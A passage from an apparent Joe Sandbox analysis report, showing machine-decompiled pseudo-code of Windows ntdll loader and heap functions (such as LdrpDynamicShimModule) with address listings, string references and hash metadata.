							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1d8c65e8;
									if(_t148 != 0) {
										 *0x1d8c91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1D7EDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1D7E3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1D7E9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1D83247B();
									goto L26;
								} else {
									_t152 = E1D7EA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                            0x1d7d9046
                                                                            0x1d7d9046
                                                                            0x1d7d904b
                                                                            0x1d7d9050
                                                                            0x1d7d9055
                                                                            0x1d7d905b
                                                                            0x1d7d905d
                                                                            0x1d7d9066
                                                                            0x1d7d906f
                                                                            0x1d7d9078
                                                                            0x1d7d9080
                                                                            0x1d7d9088
                                                                            0x1d7d908f
                                                                            0x1d7d9095
                                                                            0x1d7d90a9
                                                                            0x1d7d90b1
                                                                            0x1d7d90be
                                                                            0x1d7d90c6
                                                                            0x1d7d90cf
                                                                            0x1d7d90e2
                                                                            0x1d7d90f7
                                                                            0x1d7d90fb
                                                                            0x1d7d9118
                                                                            0x00000000
                                                                            0x1d7d9123
                                                                            0x1d7d913b
                                                                            0x1d7d913f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d9147
                                                                            0x1d83231f
                                                                            0x1d83231f
                                                                            0x00000000
                                                                            0x1d83231f
                                                                            0x1d7d9154
                                                                            0x1d832330
                                                                            0x1d832336
                                                                            0x1d832336
                                                                            0x1d7d915a
                                                                            0x1d7d915a
                                                                            0x1d7d915a
                                                                            0x1d7d9161
                                                                            0x1d7d9167
                                                                            0x1d7d916b
                                                                            0x1d7d9172
                                                                            0x1d7d9182
                                                                            0x1d7d918e
                                                                            0x1d7d9199
                                                                            0x1d7d91ba
                                                                            0x1d7d91be
                                                                            0x00000000
                                                                            0x1d7d91e0
                                                                            0x1d832358
                                                                            0x1d832360
                                                                            0x1d832368
                                                                            0x1d83236a
                                                                            0x1d832372
                                                                            0x00000000
                                                                            0x1d832378
                                                                            0x1d832378
                                                                            0x1d832381
                                                                            0x1d832458
                                                                            0x1d832458
                                                                            0x1d83245b
                                                                            0x1d832463
                                                                            0x1d832468
                                                                            0x1d83246e
                                                                            0x1d83246e
                                                                            0x1d8324a7
                                                                            0x00000000
                                                                            0x1d8324a7
                                                                            0x1d83238f
                                                                            0x1d832396
                                                                            0x1d83239c
                                                                            0x1d83239f
                                                                            0x1d83239f
                                                                            0x1d8323bb
                                                                            0x1d8323c8
                                                                            0x1d8323ca
                                                                            0x1d8323d2
                                                                            0x1d83244c
                                                                            0x1d83244c
                                                                            0x1d832453
                                                                            0x00000000
                                                                            0x1d8323d4
                                                                            0x1d8323e7
                                                                            0x1d8323e9
                                                                            0x1d8323f1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8323f9
                                                                            0x1d832402
                                                                            0x1d832408
                                                                            0x1d83240c
                                                                            0x1d832413
                                                                            0x1d832423
                                                                            0x1d83243f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d832441
                                                                            0x1d832446
                                                                            0x1d832446
                                                                            0x00000000
                                                                            0x1d832446
                                                                            0x1d8323fb
                                                                            0x00000000
                                                                            0x1d8323fb
                                                                            0x1d8323d2
                                                                            0x00000000
                                                                            0x1d832372
                                                                            0x1d7d91be
                                                                            0x1d7d9118
                                                                            0x1d7d90fd
                                                                            0x1d7d9102
                                                                            0x1d7d910e

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$@
                                                                            • API String ID: 3446177414-1194432280
                                                                            • Opcode ID: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                            • Instruction ID: 54a48adf9260cb7e732b257a0f05578fcf82192ce9e0c8142b873213fb207135
                                                                            • Opcode Fuzzy Hash: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                            • Instruction Fuzzy Hash: E6811C75D002699BDB21CF54CC85BEEB6B8AF09750F0141EAE91DB7250E7709E84CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7F237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 35%
                                                                            			E1D7F237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x1d8c38b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x1d8c68d8; // 0x0
						if(_t22 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x1d8c68d8 = _t50;
							 *0x1d8c5d4c = _t50;
						}
					}
					 *0x1d8c38b8 = _t38;
					return _t55;
				}
				_t59 =  *0x1d8c68d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x1d8c38b8 = 0;
					_t55 = E1D851BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x1d8c68d8; // 0x0
						while( *_t51 != 0) {
							 *0x1d8c91e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x1d8c9218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E1D7DFED0(0x1d8c32d8);
						if( *0x1d8c65f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E1D7C6704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x1d8c32d8);
						E1D7DE740(_t46);
						goto L21;
					}
					_t36 =  *0x1d8c37c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x1d8c37c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                                            0x1d7f2383
                                                                            0x1d7f238b
                                                                            0x1d7f238d
                                                                            0x1d7f2390
                                                                            0x1d7f2393
                                                                            0x1d7f2397
                                                                            0x1d7f23a5
                                                                            0x1d7f23a8
                                                                            0x1d7f23aa
                                                                            0x1d7f23b1
                                                                            0x1d83a878
                                                                            0x1d83a87d
                                                                            0x1d83a883
                                                                            0x1d83a883
                                                                            0x1d7f23b1
                                                                            0x1d7f23ba
                                                                            0x1d7f23c3
                                                                            0x1d7f23c3
                                                                            0x1d7f2399
                                                                            0x1d7f239f
                                                                            0x1d83a784
                                                                            0x1d83a78f
                                                                            0x1d83a793
                                                                            0x1d83a7cd
                                                                            0x1d83a80b
                                                                            0x1d83a7e3
                                                                            0x1d83a7e9
                                                                            0x1d83a7ee
                                                                            0x1d83a866
                                                                            0x1d83a85f
                                                                            0x1d83a85f
                                                                            0x00000000
                                                                            0x1d83a85f
                                                                            0x1d83a7f0
                                                                            0x1d83a7f2
                                                                            0x1d83a7f2
                                                                            0x1d83a7f5
                                                                            0x1d83a7f5
                                                                            0x1d83a7f8
                                                                            0x1d83a7fb
                                                                            0x1d83a808
                                                                            0x1d83a808
                                                                            0x1d83a812
                                                                            0x1d83a817
                                                                            0x1d83a81f
                                                                            0x1d83a825
                                                                            0x1d83a826
                                                                            0x1d83a82d
                                                                            0x1d83a82f
                                                                            0x1d83a83b
                                                                            0x1d83a83d
                                                                            0x1d83a849
                                                                            0x1d83a850
                                                                            0x1d83a850
                                                                            0x1d83a849
                                                                            0x1d83a855
                                                                            0x1d83a85a
                                                                            0x00000000
                                                                            0x1d83a85a
                                                                            0x1d83a795
                                                                            0x1d83a79c
                                                                            0x1d83a7b4
                                                                            0x1d83a7b9
                                                                            0x1d83a7be
                                                                            0x1d83a7c3
                                                                            0x1d83a7c5
                                                                            0x1d83a7c5
                                                                            0x1d83a7c6
                                                                            0x1d83a7c6
                                                                            0x00000000

                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D83A79F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D83A7AF
                                                                            • apphelp.dll, xrefs: 1D7F2382
                                                                            • LdrpDynamicShimModule, xrefs: 1D83A7A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                            • Instruction ID: b03f96a8c1e0c7cfcb9224bb8c09051e3519726927bba110772112c69590e346
                                                                            • Opcode Fuzzy Hash: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                            • Instruction Fuzzy Hash: CF3139B5E00151FBD7209F59C8C5BEAB7B4FB84754F154069E918A7260D770E942CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7CF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 65%
                                                                            			E1D7CF8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x1d8cb370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x1d8c6960 - 2;
					if( *0x1d8c6960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E1D7CB910();
						__eflags =  *0x1d8c5da8;
						if(__eflags == 0) {
							_t139 = 2;
							E1D88FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E1D814B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E1D8778DE(_t141, _t161, 0, 8, 0);
					}
					E1D7CFD8E(_t161, _t158);
					E1D8902EC(_t161);
					_t158 = 1;
					E1D7C918A(_t161, 1, 0, 0);
					E1D898E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x1d8c3758; // 0x0
					 *0x1d8c91e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E1D8778DE(_t147, _t161, 0, 8, 0);
				}
				E1D7CFD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E1D87F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E1D7DFED0(0x1d8c4800);
						E1D7CFAEC(_t161);
						_push(0x1d8c4800);
						E1D7DE740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E1D7CFABA( &_v92,  &_v96, 0x8000);
							_t91 = E1D7E3C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E1D88DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E1D7CFABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E1D7CFABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E1D7CFA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E1D7E3C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E1D7E3C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E1D812F90();
								}
							}
							_t107 = E1D7E3C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E1D7E3C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E1D812F90();
							}
							if(E1D7E3C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E1D88D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                            0x1d7cf8b0
                                                                            0x1d7cf8b8
                                                                            0x1d7cf8c2
                                                                            0x1d7cf8c6
                                                                            0x1d7cf8c9
                                                                            0x1d7cf8ce
                                                                            0x1d82e467
                                                                            0x1d82e46e
                                                                            0x1d82e474
                                                                            0x1d82e47a
                                                                            0x1d82e47e
                                                                            0x1d82e49d
                                                                            0x1d82e4a2
                                                                            0x1d82e480
                                                                            0x1d82e495
                                                                            0x1d82e49a
                                                                            0x1d82e4a8
                                                                            0x1d82e4ad
                                                                            0x1d82e4b2
                                                                            0x1d82e4ba
                                                                            0x1d82e4c2
                                                                            0x1d82e4c3
                                                                            0x1d82e4c3
                                                                            0x1d82e4ba
                                                                            0x1d7cf9f6
                                                                            0x1d7cf9f6
                                                                            0x1d7cf9f8
                                                                            0x1d7cf9fc
                                                                            0x1d7cf9fd
                                                                            0x1d7cf9fe
                                                                            0x1d7cfa09
                                                                            0x1d7cfa09
                                                                            0x1d7cf8db
                                                                            0x1d82e4cd
                                                                            0x1d82e4d3
                                                                            0x1d82e4d6
                                                                            0x1d7cfa37
                                                                            0x1d7cfa37
                                                                            0x00000000
                                                                            0x1d7cfa37
                                                                            0x1d82e4dc
                                                                            0x1d82e4e1
                                                                            0x1d82e4e3
                                                                            0x1d82e4e9
                                                                            0x1d82e4eb
                                                                            0x1d82e4eb
                                                                            0x1d82e4f2
                                                                            0x1d82e4f9
                                                                            0x1d82e504
                                                                            0x1d82e505
                                                                            0x1d82e50c
                                                                            0x00000000
                                                                            0x1d82e50c
                                                                            0x1d7cf8e8
                                                                            0x1d82e516
                                                                            0x1d82e51f
                                                                            0x1d82e525
                                                                            0x00000000
                                                                            0x1d82e525
                                                                            0x1d7cf8ee
                                                                            0x1d7cf8ee
                                                                            0x1d7cf8f5
                                                                            0x1d82e530
                                                                            0x1d82e532
                                                                            0x1d82e532
                                                                            0x1d7cf8fd
                                                                            0x1d7cf909
                                                                            0x1d82e53c
                                                                            0x1d82e543
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d82e54b
                                                                            0x1d82e550
                                                                            0x1d82e552
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7cf90f
                                                                            0x1d7cf90f
                                                                            0x1d7cf918
                                                                            0x00000000
                                                                            0x1d7cf91e
                                                                            0x1d7cf924
                                                                            0x1d7cf92b
                                                                            0x1d7cf930
                                                                            0x1d7cf931
                                                                            0x1d7cf936
                                                                            0x1d7cf93c
                                                                            0x1d7cf93e
                                                                            0x1d82e55d
                                                                            0x1d82e55f
                                                                            0x1d82e563
                                                                            0x1d82e56a
                                                                            0x1d82e578
                                                                            0x1d82e57c
                                                                            0x1d82e581
                                                                            0x1d82e586
                                                                            0x1d82e588
                                                                            0x1d82e59a
                                                                            0x1d82e58a
                                                                            0x1d82e593
                                                                            0x1d82e593
                                                                            0x1d82e59f
                                                                            0x1d82e5a2
                                                                            0x1d82e5a8
                                                                            0x1d82e5ae
                                                                            0x1d82e5ae
                                                                            0x1d82e5b3
                                                                            0x1d82e5b3
                                                                            0x1d7cf94d
                                                                            0x1d7cfa0c
                                                                            0x1d7cf953
                                                                            0x1d7cf953
                                                                            0x1d7cf953
                                                                            0x1d7cf957
                                                                            0x1d7cfa17
                                                                            0x1d7cfa1b
                                                                            0x1d7cfa28
                                                                            0x1d7cfa2d
                                                                            0x1d7cfa2d
                                                                            0x1d7cf95d
                                                                            0x1d7cf965
                                                                            0x1d82e5c7
                                                                            0x1d82e5cc
                                                                            0x1d82e5ce
                                                                            0x1d82e5d3
                                                                            0x1d82e5d3
                                                                            0x1d7cf96f
                                                                            0x1d7cf981
                                                                            0x1d7cf981
                                                                            0x00000000
                                                                            0x1d7cf987
                                                                            0x1d7cf98d
                                                                            0x1d7cf992
                                                                            0x1d7cf999
                                                                            0x00000000
                                                                            0x1d7cf99b
                                                                            0x1d7cf99b
                                                                            0x1d7cf9a0
                                                                            0x1d7cf9ac
                                                                            0x1d82e5e3
                                                                            0x1d7cf9b2
                                                                            0x1d7cf9b2
                                                                            0x1d7cf9b2
                                                                            0x1d7cf9b7
                                                                            0x1d82e5ea
                                                                            0x1d82e5f0
                                                                            0x1d82e5f7
                                                                            0x1d82e5fd
                                                                            0x1d82e602
                                                                            0x1d82e604
                                                                            0x1d82e60f
                                                                            0x1d82e60f
                                                                            0x1d82e60f
                                                                            0x1d82e618
                                                                            0x1d82e621
                                                                            0x1d82e622
                                                                            0x1d82e624
                                                                            0x1d82e62c
                                                                            0x1d82e62d
                                                                            0x1d82e631
                                                                            0x1d82e631
                                                                            0x1d82e5f7
                                                                            0x1d7cf9bd
                                                                            0x1d7cf9c2
                                                                            0x1d7cf9ce
                                                                            0x1d82e644
                                                                            0x1d7cf9d4
                                                                            0x1d7cf9d4
                                                                            0x1d7cf9d4
                                                                            0x1d7cf9d9
                                                                            0x1d82e64b
                                                                            0x1d82e650
                                                                            0x1d82e652
                                                                            0x1d82e65d
                                                                            0x1d82e65d
                                                                            0x1d82e65d
                                                                            0x1d82e666
                                                                            0x1d82e66f
                                                                            0x1d82e670
                                                                            0x1d82e672
                                                                            0x1d82e67a
                                                                            0x1d82e67b
                                                                            0x1d82e67f
                                                                            0x1d82e67f
                                                                            0x1d7cf9e6
                                                                            0x1d82e692
                                                                            0x1d7cf9ec
                                                                            0x1d7cf9ec
                                                                            0x1d7cf9ec
                                                                            0x1d7cf9f4
                                                                            0x1d7cfa3d
                                                                            0x1d7cfa3d
                                                                            0x00000000
                                                                            0x1d7cf9f4
                                                                            0x1d7cf999
                                                                            0x1d7cf918

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 3446177414-3610490719
                                                                            • Opcode ID: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                            • Instruction ID: e780e18fb9f0a4fc098640607b5e3dac60d1cc3809eb227cbe9f5b479f026f2e
                                                                            • Opcode Fuzzy Hash: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                            • Instruction Fuzzy Hash: 7B912672209752EFD716CB24C884B6EF7A5BF84B60F01445AFA458B291DB34F885C793
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7F0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 56%
                                                                            			E1D7F0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1d8c68d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1d8c65f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1D807550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1D7DFED0(0x1d8c32d8);
					if( *0x1d8c65f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1d8c9218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1d8c32d8);
						E1D7DE740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1D7C6DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1D7D98DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1d8c65f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1d8c91e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1D7F1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1d8c68d8;
									if( *0x1d8c68d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
